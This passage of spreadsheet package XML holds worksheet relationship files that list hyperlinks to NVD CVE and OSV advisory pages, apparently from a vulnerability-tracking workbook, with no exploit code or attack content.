Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84281" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84862" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85750" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93303" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93654" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94573" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95864" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95866" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96039" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96568" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96752" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97060" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100555" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100598" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53626" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53629" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56723" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56724" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56727" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57449" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67408" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67419" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84464" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84465" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93306" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93365" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100419" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100504" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97589" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97608" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97609" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97926" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97931" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97953" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98027" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98029" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98030" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98041" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98083" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98150" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98154" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87902" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88351" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97230" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51994" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92288" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51997" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85491" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88361" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88362" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88373" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88388" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88369" TargetMode="External" Id="rId237" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14281" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95832" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39353" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42322" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62262" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84458" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89055" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93399" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97063" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97064" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100520" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100544" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100552" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100580" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100587" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100599" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19804" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61525" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89426" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93834" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94445" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96795" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96812" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97555" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98115" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56725" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56733" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100368" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100369" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100551" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100588" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100567" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67236" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67409" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67410" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97525" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100387" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100389" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100532" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44642" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51773" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92713" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97875" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98069" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98070" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100561" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100585" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100570" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100597" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91837" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91838" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91839" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91841" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97580" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97594" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97602" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97612" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97910" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97971" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97991" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98023" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98073" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98122" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98156" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100578" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100579" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67239" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100535" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100541" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100543" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100558" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13456" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49850" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50547" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53625" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67237" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84882" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88003" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88421" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89406" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97595" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98050" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100310" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93901" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97865" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97882" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97883" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97885" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100372" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33639" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42323" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42324" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83591" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84279" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84280" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84281" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85750" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93303" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93654" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94573" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95864" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95866" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96039" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96568" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96752" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97060" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100555" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100598" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56723" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56727" TargetMode="External" Id="rId110" /><Relationship 